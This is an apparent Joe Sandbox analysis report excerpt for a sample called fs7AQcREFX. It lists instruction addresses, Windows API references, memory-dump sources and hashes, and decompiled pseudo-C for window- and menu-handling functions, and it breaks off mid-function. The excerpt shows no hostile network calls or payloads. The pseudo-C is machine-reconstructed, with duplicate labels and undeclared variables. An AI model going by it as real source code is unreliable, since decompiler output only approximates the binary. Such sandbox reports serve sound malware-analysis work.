                                                                                                                                                                                                                                                                                          0x0010103d
                                                                                                                                                                                                                                                                                          0x00101041
                                                                                                                                                                                                                                                                                          0x00101048
                                                                                                                                                                                                                                                                                          0x001010e3
                                                                                                                                                                                                                                                                                          0x001010f5
                                                                                                                                                                                                                                                                                          0x0010104e
                                                                                                                                                                                                                                                                                          0x00101053
                                                                                                                                                                                                                                                                                          0x00101056
                                                                                                                                                                                                                                                                                          0x00101059
                                                                                                                                                                                                                                                                                          0x0010105c
                                                                                                                                                                                                                                                                                          0x00101064
                                                                                                                                                                                                                                                                                          0x0010106a
                                                                                                                                                                                                                                                                                          0x0010106e
                                                                                                                                                                                                                                                                                          0x00101074
                                                                                                                                                                                                                                                                                          0x00101077
                                                                                                                                                                                                                                                                                          0x0010107c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010107e
                                                                                                                                                                                                                                                                                          0x0010107e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00101084
                                                                                                                                                                                                                                                                                          0x00101087
                                                                                                                                                                                                                                                                                          0x00101089
                                                                                                                                                                                                                                                                                          0x00101089
                                                                                                                                                                                                                                                                                          0x00101090
                                                                                                                                                                                                                                                                                          0x00101093
                                                                                                                                                                                                                                                                                          0x00101096
                                                                                                                                                                                                                                                                                          0x00101099
                                                                                                                                                                                                                                                                                          0x0010109c
                                                                                                                                                                                                                                                                                          0x001010aa
                                                                                                                                                                                                                                                                                          0x001010ae
                                                                                                                                                                                                                                                                                          0x001010b3
                                                                                                                                                                                                                                                                                          0x001010b6
                                                                                                                                                                                                                                                                                          0x001010b9
                                                                                                                                                                                                                                                                                          0x001010bc
                                                                                                                                                                                                                                                                                          0x001010c8
                                                                                                                                                                                                                                                                                          0x001010d0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001010d2
                                                                                                                                                                                                                                                                                          0x001010d7
                                                                                                                                                                                                                                                                                          0x001010dd
                                                                                                                                                                                                                                                                                          0x001010e1
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001010fd
                                                                                                                                                                                                                                                                                          0x001010fd
                                                                                                                                                                                                                                                                                          0x00101100
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00101102
                                                                                                                                                                                                                                                                                          0x00101113
                                                                                                                                                                                                                                                                                          0x00101113
                                                                                                                                                                                                                                                                                          0x00101100
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001010f8
                                                                                                                                                                                                                                                                                          0x001010f8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001010f8
                                                                                                                                                                                                                                                                                          0x0010107c
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetClientRect.USER32 ref: 00101064
                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32 ref: 0010106E
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000417,?,?), ref: 001010AA
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000041D,?,?), ref: 001010C8
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageSend$ClientCountItemMenuRect
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4098442271-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 75637e6e92d0f7138c334752eb2919c2005ee934af92498b4c5dae486f7d49dd
                                                                                                                                                                                                                                                                                          • Instruction ID: 82eb09ff54a499f6cbc739f09aacace96adbf525e393a3ab600b0f2267ed0630
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75637e6e92d0f7138c334752eb2919c2005ee934af92498b4c5dae486f7d49dd
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F3103B1D04218AFCB54DFA9D9819EEFBF4FF08310F10422AE995E7680D775A981CB90
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                          			E000F9BC0(intOrPtr __ecx, CHAR* __edx, void* __eflags, int _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                                                                                                          				intOrPtr _v280;
                                                                                                                                                                                                                                                                                          				CHAR* _v284;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t19;
                                                                                                                                                                                                                                                                                          				signed int _t23;
                                                                                                                                                                                                                                                                                          				signed int _t28;
                                                                                                                                                                                                                                                                                          				intOrPtr _t30;
                                                                                                                                                                                                                                                                                          				intOrPtr _t50;
                                                                                                                                                                                                                                                                                          				signed int _t53;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t54;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t47 = __edx;
                                                                                                                                                                                                                                                                                          				_t19 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t19 ^ _t53;
                                                                                                                                                                                                                                                                                          				_t50 = __ecx;
                                                                                                                                                                                                                                                                                          				_t52 = __ecx + 0x38;
                                                                                                                                                                                                                                                                                          				_v280 = __ecx;
                                                                                                                                                                                                                                                                                          				_t38 = __edx;
                                                                                                                                                                                                                                                                                          				 *_t54 = 0;
                                                                                                                                                                                                                                                                                          				if(E000FCCE0(__ecx + 0x38, __ecx) != 0) {
                                                                                                                                                                                                                                                                                          					_t23 =  *_t38;
                                                                                                                                                                                                                                                                                          					__eflags = _t23;
                                                                                                                                                                                                                                                                                          					if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          						__eflags = _t23 - 0x22;
                                                                                                                                                                                                                                                                                          						if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          							_t38 =  &(_t38[1]);
                                                                                                                                                                                                                                                                                          							_t52 = 0;
                                                                                                                                                                                                                                                                                          							__eflags = lstrlenA(_t38);
                                                                                                                                                                                                                                                                                          							if(__eflags > 0) {
                                                                                                                                                                                                                                                                                          								while(1) {
                                                                                                                                                                                                                                                                                          									__eflags =  *((char*)(_t52 + _t38)) - 0x22;
                                                                                                                                                                                                                                                                                          									if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          										break;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t52 = _t52 + 1;
                                                                                                                                                                                                                                                                                          									__eflags = _t52 - lstrlenA(_t38);
                                                                                                                                                                                                                                                                                          									if(__eflags < 0) {
                                                                                                                                                                                                                                                                                          										continue;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									goto L11;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								 *((char*)(_t52 + _t38)) = 0;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							L11:
                                                                                                                                                                                                                                                                                          							_t50 = _v280;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v284 = 0;
                                                                                                                                                                                                                                                                                          						GetFullPathNameA(_t38, 0x104,  &_v276,  &_v284);
                                                                                                                                                                                                                                                                                          						_t48 = _v284;
                                                                                                                                                                                                                                                                                          						_t28 = E000F8380(_t50 + 0x38, __eflags,  &_v276, _v284);
                                                                                                                                                                                                                                                                                          						__eflags = _t28;
                                                                                                                                                                                                                                                                                          						if(_t28 != 0) {
                                                                                                                                                                                                                                                                                          							_t38 = _t50 + 0x140;
                                                                                                                                                                                                                                                                                          							E000FB170(_t50 + 0x140,  &_v276, _t48);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						E000F8220(_t52, __eflags);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					ShowWindow( *(_t50 + 0x3c), _a4);
                                                                                                                                                                                                                                                                                          					_t30 = E000F49A0(_a4, _t50);
                                                                                                                                                                                                                                                                                          					__eflags = _v8 ^ _t53;
                                                                                                                                                                                                                                                                                          					return E001059E6(_t30, _t38, _v8 ^ _t53,  *(_t50 + 0x3c), _t50, _t52);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					return E001059E6(_t22, _t38, _v8 ^ _t53, _t47, _t50, _t52);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                                          0x000f9bc0
                                                                                                                                                                                                                                                                                          0x000f9bc9
                                                                                                                                                                                                                                                                                          0x000f9bd0
                                                                                                                                                                                                                                                                                          0x000f9bd6
                                                                                                                                                                                                                                                                                          0x000f9bdb
                                                                                                                                                                                                                                                                                          0x000f9bde
                                                                                                                                                                                                                                                                                          0x000f9be4
                                                                                                                                                                                                                                                                                          0x000f9be6
                                                                                                                                                                                                                                                                                          0x000f9bf3
                                                                                                                                                                                                                                                                                          0x000f9c08
                                                                                                                                                                                                                                                                                          0x000f9c0a
                                                                                                                                                                                                                                                                                          0x000f9c0c
                                                                                                                                                                                                                                                                                          0x000f9c1a
                                                                                                                                                                                                                                                                                          0x000f9c1c
                                                                                                                                                                                                                                                                                          0x000f9c24
                                                                                                                                                                                                                                                                                          0x000f9c26
                                                                                                                                                                                                                                                                                          0x000f9c2a
                                                                                                                                                                                                                                                                                          0x000f9c2c
                                                                                                                                                                                                                                                                                          0x000f9c30
                                                                                                                                                                                                                                                                                          0x000f9c30
                                                                                                                                                                                                                                                                                          0x000f9c34
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f9c37
                                                                                                                                                                                                                                                                                          0x000f9c3a
                                                                                                                                                                                                                                                                                          0x000f9c3c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f9c3e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f9c3c
                                                                                                                                                                                                                                                                                          0x000f9c40
                                                                                                                                                                                                                                                                                          0x000f9c40
                                                                                                                                                                                                                                                                                          0x000f9c44
                                                                                                                                                                                                                                                                                          0x000f9c44
                                                                                                                                                                                                                                                                                          0x000f9c44
                                                                                                                                                                                                                                                                                          0x000f9c5e
                                                                                                                                                                                                                                                                                          0x000f9c68
                                                                                                                                                                                                                                                                                          0x000f9c6e
                                                                                                                                                                                                                                                                                          0x000f9c7f
                                                                                                                                                                                                                                                                                          0x000f9c84
                                                                                                                                                                                                                                                                                          0x000f9c86
                                                                                                                                                                                                                                                                                          0x000f9c88
                                                                                                                                                                                                                                                                                          0x000f9c94
                                                                                                                                                                                                                                                                                          0x000f9c94
                                                                                                                                                                                                                                                                                          0x000f9c0e
                                                                                                                                                                                                                                                                                          0x000f9c10
                                                                                                                                                                                                                                                                                          0x000f9c10
                                                                                                                                                                                                                                                                                          0x000f9ca1
                                                                                                                                                                                                                                                                                          0x000f9ca7
                                                                                                                                                                                                                                                                                          0x000f9cb1
                                                                                                                                                                                                                                                                                          0x000f9cbc
                                                                                                                                                                                                                                                                                          0x000f9bf8
                                                                                                                                                                                                                                                                                          0x000f9c05
                                                                                                                                                                                                                                                                                          0x000f9c05

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FCCE0: LoadStringA.USER32 ref: 000FCD16
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FCCE0: LoadMenuA.USER32 ref: 000FCD2B
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FCCE0: LoadAcceleratorsA.USER32 ref: 000FCD91
                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,?,?,00000000,?,00000104,?,?), ref: 000F9CA1
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Load$AcceleratorsMenuShowStringWindow
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1999622886-0
                                                                                                                                                                                                                                                                                          • Opcode ID: eeb41a175a518f041456caa9681d057ae5d643293981436cd7ad23d9a8428077
                                                                                                                                                                                                                                                                                          • Instruction ID: 3bebb286ae3bbeed7dd345876df4d437940fde7a3132e4329973e0dff66566ee
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eeb41a175a518f041456caa9681d057ae5d643293981436cd7ad23d9a8428077
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9621E47260011C9BDB69DB24DD82BFAB3E8FF94300F104099E74997941DB70AE82DBE0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                                                                                          			E00100F60(intOrPtr __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				signed char _v16;
                                                                                                                                                                                                                                                                                          				signed char _v20;
                                                                                                                                                                                                                                                                                          				signed char _v24;
                                                                                                                                                                                                                                                                                          				signed char _v28;
                                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v48;
                                                                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                                                                          				void* _v64;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t28;
                                                                                                                                                                                                                                                                                          				intOrPtr _t40;
                                                                                                                                                                                                                                                                                          				intOrPtr _t50;
                                                                                                                                                                                                                                                                                          				int _t51;
                                                                                                                                                                                                                                                                                          				signed int _t52;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t50 = __edi;
                                                                                                                                                                                                                                                                                          				_t28 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_t29 = _t28 ^ _t52;
                                                                                                                                                                                                                                                                                          				_v12 = _t28 ^ _t52;
                                                                                                                                                                                                                                                                                          				_t40 = _a4;
                                                                                                                                                                                                                                                                                          				if(_t40 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          					L9:
                                                                                                                                                                                                                                                                                          					return E001059E6(_t29 | 0xffffffff, _t40, _v12 ^ _t52, _t48, _t50, _t51);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t29 = GetClientRect( *(__edi + 4),  &_v48);
                                                                                                                                                                                                                                                                                          					_t51 = _t40 - 1;
                                                                                                                                                                                                                                                                                          					if(_t51 == _t40) {
                                                                                                                                                                                                                                                                                          						goto L9;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t40 = SendMessageA;
                                                                                                                                                                                                                                                                                          						L3:
                                                                                                                                                                                                                                                                                          						L3:
                                                                                                                                                                                                                                                                                          						if(_t51 < 0) {
                                                                                                                                                                                                                                                                                          							_t7 = GetMenuItemCount( *(_t50 + 0x44)) - 1; // -1
                                                                                                                                                                                                                                                                                          							_t51 = _t7;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v32 = 0;
                                                                                                                                                                                                                                                                                          						_v28 = 0;
                                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                                          						_v16 = 0;
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t50 + 4), 0x417, _t51,  &_v32);
                                                                                                                                                                                                                                                                                          						_t48 =  &_v64;
                                                                                                                                                                                                                                                                                          						_t29 = SendMessageA( *(_t50 + 4), 0x41d, _t51,  &_v64);
                                                                                                                                                                                                                                                                                          						if(_v56 > _v48.right) {
                                                                                                                                                                                                                                                                                          							goto L10;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t29 = _v24;
                                                                                                                                                                                                                                                                                          						if((_t29 & 0x00000004) == 0 || (_t29 & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                          							_t51 = _t51 - 1;
                                                                                                                                                                                                                                                                                          							if(_t51 != _a4) {
                                                                                                                                                                                                                                                                                          								goto L3;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								goto L9;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							L11:
                                                                                                                                                                                                                                                                                          							if(_t51 == _a4) {
                                                                                                                                                                                                                                                                                          								goto L9;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								return E001059E6(_t51, _t40, _v12 ^ _t52, _t48, _t50, _t51);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L13;
                                                                                                                                                                                                                                                                                          						L10:
                                                                                                                                                                                                                                                                                          						_t51 = 0xfffffffe;
                                                                                                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L13:
                                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                                          0x00100f60
                                                                                                                                                                                                                                                                                          0x00100f66
                                                                                                                                                                                                                                                                                          0x00100f6b
                                                                                                                                                                                                                                                                                          0x00100f6d
                                                                                                                                                                                                                                                                                          0x00100f71
                                                                                                                                                                                                                                                                                          0x00100f78
                                                                                                                                                                                                                                                                                          0x00100ff0
                                                                                                                                                                                                                                                                                          0x00101002
                                                                                                                                                                                                                                                                                          0x00100f7a
                                                                                                                                                                                                                                                                                          0x00100f82
                                                                                                                                                                                                                                                                                          0x00100f88
                                                                                                                                                                                                                                                                                          0x00100f8d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00100f8f
                                                                                                                                                                                                                                                                                          0x00100f8f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00100f95
                                                                                                                                                                                                                                                                                          0x00100f97
                                                                                                                                                                                                                                                                                          0x00100fa3
                                                                                                                                                                                                                                                                                          0x00100fa3
                                                                                                                                                                                                                                                                                          0x00100fa3
                                                                                                                                                                                                                                                                                          0x00100fab
                                                                                                                                                                                                                                                                                          0x00100fae
                                                                                                                                                                                                                                                                                          0x00100fb1
                                                                                                                                                                                                                                                                                          0x00100fb4
                                                                                                                                                                                                                                                                                          0x00100fb7
                                                                                                                                                                                                                                                                                          0x00100fc5
                                                                                                                                                                                                                                                                                          0x00100fca
                                                                                                                                                                                                                                                                                          0x00100fd5
                                                                                                                                                                                                                                                                                          0x00100fdd
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00100fdf
                                                                                                                                                                                                                                                                                          0x00100fe4
                                                                                                                                                                                                                                                                                          0x00100fea
                                                                                                                                                                                                                                                                                          0x00100fee
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010100a
                                                                                                                                                                                                                                                                                          0x0010100a
                                                                                                                                                                                                                                                                                          0x0010100d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010100f
                                                                                                                                                                                                                                                                                          0x00101020
                                                                                                                                                                                                                                                                                          0x00101020
                                                                                                                                                                                                                                                                                          0x0010100d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00101005
                                                                                                                                                                                                                                                                                          0x00101005
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00101005
                                                                                                                                                                                                                                                                                          0x00100f8d
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetClientRect.USER32 ref: 00100F82
                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32 ref: 00100F9D
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000417,?,?), ref: 00100FC5
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000041D,?,?), ref: 00100FD5
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageSend$ClientCountItemMenuRect
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4098442271-0
                                                                                                                                                                                                                                                                                          • Opcode ID: cdb7d63c524ddc3c187b491e879820b3ae43d0569747f550ccec85b087b664e9
                                                                                                                                                                                                                                                                                          • Instruction ID: 3737a7fcf24bfa309571c91b4a30525628874e6ebdc4a1ce3e990dc91473cd0b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cdb7d63c524ddc3c187b491e879820b3ae43d0569747f550ccec85b087b664e9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67215171E0061AAFCB15DFA8D984AEEF7B4FF08324F004219E969A7291D771AD41CBD0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                                                                                                                                                                          			E000FDD83(char _a4, long _a8, long* _a12) {
                                                                                                                                                                                                                                                                                          				char _v4;
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION* _v24;
                                                                                                                                                                                                                                                                                          				long _t50;
                                                                                                                                                                                                                                                                                          				signed int _t51;
                                                                                                                                                                                                                                                                                          				long* _t52;
                                                                                                                                                                                                                                                                                          				long* _t53;
                                                                                                                                                                                                                                                                                          				struct HHOOK__* _t56;
                                                                                                                                                                                                                                                                                          				signed int _t59;
                                                                                                                                                                                                                                                                                          				long _t64;
                                                                                                                                                                                                                                                                                          				void* _t69;
                                                                                                                                                                                                                                                                                          				struct HHOOK__** _t70;
                                                                                                                                                                                                                                                                                          				long _t73;
                                                                                                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                                                                                                          				int _t79;
                                                                                                                                                                                                                                                                                          				struct HHOOK__** _t85;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t89;
                                                                                                                                                                                                                                                                                          				long _t92;
                                                                                                                                                                                                                                                                                          				struct HHOOK__** _t94;
                                                                                                                                                                                                                                                                                          				int* _t96;
                                                                                                                                                                                                                                                                                          				long* _t97;
                                                                                                                                                                                                                                                                                          				char _t98;
                                                                                                                                                                                                                                                                                          				long _t100;
                                                                                                                                                                                                                                                                                          				signed int _t105;
                                                                                                                                                                                                                                                                                          				long _t112;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t73 = _a8;
                                                                                                                                                                                                                                                                                          				_t112 =  *0x171994; // 0x0
                                                                                                                                                                                                                                                                                          				if(_t112 == 0) {
                                                                                                                                                                                                                                                                                          					L19:
                                                                                                                                                                                                                                                                                          					LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          					 *(_t73 + 0x85) =  *(_t73 + 0x85) ^ (GetWindowLongA( *(_t73 + 4), 0xffffffec) >> 0x00000016 << 0x00000006 ^  *(_t73 + 0x85)) & 0x00000040;
                                                                                                                                                                                                                                                                                          					 *[fs:0x0] = _v12;
                                                                                                                                                                                                                                                                                          					return _v24;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t50 = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                          					_t96 =  *0x171994; // 0x0
                                                                                                                                                                                                                                                                                          					_t79 = _t96[2];
                                                                                                                                                                                                                                                                                          					_t92 = _t50;
                                                                                                                                                                                                                                                                                          					_t51 = 0;
                                                                                                                                                                                                                                                                                          					_v20 = _t92;
                                                                                                                                                                                                                                                                                          					if(_t79 <= 0) {
                                                                                                                                                                                                                                                                                          						L8:
                                                                                                                                                                                                                                                                                          						_t52 = 0;
                                                                                                                                                                                                                                                                                          						goto L12;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t86 =  *_t96;
                                                                                                                                                                                                                                                                                          						while( *_t86 != _t92) {
                                                                                                                                                                                                                                                                                          							_t51 = _t51 + 1;
                                                                                                                                                                                                                                                                                          							_t86 = _t86 + 4;
                                                                                                                                                                                                                                                                                          							if(_t51 < _t79) {
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t52 = 0;
                                                                                                                                                                                                                                                                                          								L12:
                                                                                                                                                                                                                                                                                          								_a12 = _t52;
                                                                                                                                                                                                                                                                                          								_t116 = _t52;
                                                                                                                                                                                                                                                                                          								if(_t52 != 0) {
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t52 + 4)) =  *((intOrPtr*)(_t52 + 4)) + 1;
                                                                                                                                                                                                                                                                                          								} else {
